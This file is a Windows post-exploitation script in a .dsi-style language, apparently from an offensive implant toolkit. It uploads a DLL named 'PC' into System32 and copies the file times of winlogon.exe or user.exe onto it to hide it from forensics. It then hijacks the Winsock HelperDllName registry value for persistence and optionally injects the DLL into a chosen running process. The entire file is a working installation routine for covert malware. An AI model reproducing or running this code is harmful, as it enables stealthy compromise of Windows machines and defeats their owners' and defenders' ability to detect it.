174 lines
3.4 KiB
Text
174 lines
3.4 KiB
Text
|
|
@include "_Paths.dsi";
|
|
@include "_Processes.dsi";
|
|
@include "_Versions.dsi";
|
|
@include "windows/_RegistryIncludes.dsi";
|
|
@echo off;
|
|
@disablewow64 on;
|
|
|
|
if ($argc != 3)
|
|
{
|
|
echo("* Invalid parmeters", ERROR);
|
|
echo();
|
|
echo("Usage: $argv[0] <localFile> <procName>");
|
|
return false;
|
|
}
|
|
|
|
string $localFile = $argv[1];
|
|
string $procName = $argv[2];
|
|
string $regKey = "SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Winsock";
|
|
string $regKeyValue = "HelperDllName";
|
|
|
|
string $arch;
|
|
_GetArch($arch);
|
|
|
|
echo("", WARNING);
|
|
echo("NOTE: In order to use HelperDllName as your install point, the process for which", WARNING);
|
|
echo(" PC is configured must load wshtcpip.dll", WARNING);
|
|
|
|
# get the system path
|
|
string $sysPath;
|
|
if (!_GetSystemPath($sysPath))
|
|
{
|
|
echo("* Failed to get system path", ERROR);
|
|
return false;
|
|
}
|
|
|
|
# get the HelperDllName value
|
|
string $origKeyValue;
|
|
if (!_GetRegistryValue("L",
|
|
$regKey,
|
|
$regKeyValue,
|
|
$origKeyValue) || !defined($origKeyValue))
|
|
{
|
|
$origKeyValue = "";
|
|
}
|
|
|
|
if ($origKeyValue != "\%\%SystemRoot\%\%\\System32\\wshtcpip.dll")
|
|
{
|
|
echo("* Non-standard WSH value found ($origKeyValue)", WARNING);
|
|
if (!prompt("Do you want to continue?", false))
|
|
{
|
|
return false;
|
|
}
|
|
}
|
|
|
|
# get the process id for injection
|
|
int $id;
|
|
if (prompt("Do you want to perform injection (for instant-grat)?"))
|
|
{
|
|
if (StrLen($procName) > 0)
|
|
{
|
|
if (!_FindProcessOnList($procName, $id) || !defined($id))
|
|
{
|
|
echo("* Failed to find $procName", ERROR);
|
|
}
|
|
}
|
|
|
|
# make sure the user wants to keep going if we don't have a process
|
|
if (!defined($id))
|
|
{
|
|
echo("No process for injection", ERROR);
|
|
if (!prompt("Continue?"))
|
|
{
|
|
return false;
|
|
}
|
|
}
|
|
}
|
|
# get install name
|
|
string $installName = "wship.dll";
|
|
if (!GetInput("PC DLL install name", $installName, $installName))
|
|
{
|
|
echo("* Failed to get install name", ERROR);
|
|
return false;
|
|
}
|
|
string $installPath = "\%\%SystemRoot\%\%\\System32";
|
|
if (!GetInput("PC DLL install path", $installPath, $installPath))
|
|
{
|
|
echo("* Failed to get install path", ERROR);
|
|
return false;
|
|
}
|
|
|
|
string $usePath;
|
|
if ($installPath == "\%\%SystemRoot\%\%\\System32")
|
|
{
|
|
$usePath = $sysPath;
|
|
}
|
|
else
|
|
{
|
|
# user provided non-standard path
|
|
$usePath = $installPath;
|
|
}
|
|
|
|
# upload the file
|
|
echo "Uploading PC";
|
|
if (!`put "$localFile" -name "$usePath\\$installName" -permanent`)
|
|
{
|
|
echo(" FAILED", ERROR);
|
|
pause;
|
|
return false;
|
|
}
|
|
echo(" FINISHED", GOOD);
|
|
|
|
# matchtimes on the file
|
|
string $matchName = "user.exe";
|
|
if ($arch == "x64")
|
|
{
|
|
$matchName = "winlogon.exe";
|
|
}
|
|
echo "Matching filetimes with $matchName";
|
|
if (!`matchfiletimes -src "$sysPath\\$matchName" -dst "$usePath\\$installName"`)
|
|
{
|
|
echo(" FAILED", ERROR);
|
|
pause;
|
|
# continue...
|
|
}
|
|
else
|
|
{
|
|
echo(" FINISHED", GOOD);
|
|
}
|
|
|
|
# update the registry key
|
|
echo "Updating registry";
|
|
if (!_SetRegistryValue("L",
|
|
$regKey,
|
|
$regKeyValue,
|
|
"$installPath\\$installName",
|
|
"REG_EXPAND_SZ"))
|
|
{
|
|
echo(" FAILED", ERROR);
|
|
echo "Deleting PC";
|
|
if (!`delete -file "$usePath\\$installName"`)
|
|
{
|
|
echo(" FAILED", ERROR);
|
|
}
|
|
else
|
|
{
|
|
echo(" DELETED", GOOD);
|
|
}
|
|
pause;
|
|
return false;
|
|
}
|
|
echo(" SET", GOOD);
|
|
|
|
if (defined($id))
|
|
{
|
|
# inject the DLL
|
|
echo "Injecting DLL";
|
|
if (!`injectdll -library "$usePath\\$installName" -id $id`)
|
|
{
|
|
echo(" FAILED", ERROR);
|
|
}
|
|
else
|
|
{
|
|
echo(" INJECTED", GOOD);
|
|
}
|
|
}
|
|
|
|
echo "Install Finished";
|
|
echo "$regKeyValue before : '$origKeyValue'";
|
|
echo " $regKeyValue after : '$installPath\\$installName'";
|
|
|
|
pause;
|
|
return true;
|
|
|